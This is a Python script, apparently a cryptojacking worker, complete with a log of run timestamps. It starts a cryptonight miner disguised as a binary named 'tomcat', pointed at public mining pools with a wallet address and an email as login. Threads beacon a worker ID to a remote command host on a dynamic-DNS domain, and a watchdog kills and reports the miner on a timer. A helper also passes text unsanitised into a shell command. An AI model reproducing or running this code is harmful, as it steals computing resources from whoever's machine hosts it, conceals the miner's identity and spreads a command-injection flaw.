import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:05.275299
#2018-02-17 17:26:05.929391
#2018-02-17 19:15:06.909903
#2018-02-17 21:03:01.502545
#2018-02-17 22:48:03.666158
#2018-02-18 00:32:06.763174
#2018-02-18 02:22:07.384946
#2018-02-18 04:09:04.963453
#2018-02-18 05:58:05.560984
#2018-02-18 07:50:07.820718
#2018-02-18 09:38:06.984035
#2018-02-18 11:25:07.580890
#2018-02-18 13:11:06.928525
#2018-02-18 14:59:06.222058
#2018-02-18 16:48:04.362108
#2018-02-18 18:36:03.655052
#2018-02-18 20:24:01.997156
#2018-02-18 22:10:06.311861
#2018-02-18 23:57:06.595042
#2018-02-19 01:44:03.835205
#2018-02-19 03:32:05.078661
#2018-02-19 05:17:04.725288
#2018-02-19 07:05:04.124449
#2018-02-19 08:53:05.638448
#2018-02-19 10:42:05.924322
#2018-02-19 12:29:06.198092
#2018-02-19 14:17:01.363749
#2018-02-19 16:06:08.603489
#2018-02-19 17:54:07.944066
#2018-02-19 19:42:01.707373
#2018-02-19 21:29:05.471697
#2018-02-19 23:15:07.340014
#2018-02-20 01:02:07.662247
#2018-02-20 02:52:03.688985
#2018-02-20 04:39:05.556694
#2018-02-20 06:23:06.138999
#2018-02-20 08:08:02.214831
#2018-02-20 09:53:01.829198
#2018-02-20 11:37:07.571454
#2018-02-20 13:24:06.160364
#2018-02-20 15:09:08.309995
#2018-02-20 16:55:06.005882
#2018-02-20 18:44:07.903046
#2018-02-20 20:35:01.794784
#2018-02-20 22:19:04.778018
#2018-02-21 00:00:10.173909
#2018-02-21 01:45:06.343733
#2018-02-21 03:33:08.124629
#2018-02-21 05:22:06.305873
#2018-02-21 07:10:02.258435
#2018-02-21 08:56:01.984777
#2018-02-21 10:43:07.739606
#2018-02-21 12:31:06.827592
#2018-02-21 14:18:01.386145
#2018-02-21 16:05:01.417912
#2018-02-21 17:55:07.967810
#2018-02-21 19:40:10.716427
#2018-02-21 21:28:01.908528
#2018-02-21 23:13:06.511397
#2018-02-22 01:02:01.523310
#2018-02-22 02:49:01.401872
#2018-02-22 04:35:09.227283
#2018-02-22 06:20:08.428953
#2018-02-22 08:07:06.530878
#2018-02-22 09:54:05.137763
#2018-02-22 11:39:01.936370
#2018-02-22 13:26:07.787705
#2018-02-22 15:14:03.957184
#2018-02-22 16:58:04.858742
#2018-02-22 18:46:07.472467
#2018-02-22 20:39:05.378259
#2018-02-22 22:26:05.612470
#2018-02-23 00:11:01.657240
#2018-02-23 01:59:06.314872
#2018-02-23 03:47:08.196501
#2018-02-23 05:35:02.209560
#2018-02-23 07:19:01.901849
#2018-02-23 09:23:07.981277
#2018-02-23 11:30:05.230000
#2018-02-23 13:21:04.577777
#2018-02-23 15:08:04.451863
#2018-02-23 16:56:02.153472
#2018-02-23 18:45:08.908490
#2018-02-23 20:33:01.533244
#2018-02-23 22:20:10.583018
#2018-02-24 00:05:09.732546
#2018-02-24 01:54:06.299595
#2018-02-24 03:46:06.162520
#2018-02-24 05:34:01.826593
#2018-02-24 07:20:05.974340
#2018-02-24 09:10:04.158595
#2018-02-24 11:05:08.663443
#2018-02-24 12:54:05.679988
#2018-02-24 14:42:10.099502
#2018-02-24 16:33:03.715595
#2018-02-24 18:22:04.114201
#2018-02-24 20:08:06.276892
#2018-02-24 21:51:07.548214
#2018-02-25 00:51:07.779890
#2018-02-25 03:52:06.477847
#2018-02-25 06:38:01.472023
#2018-02-25 11:36:06.143255
#2018-02-25 13:41:01.356901
#2018-02-25 15:15:02.774349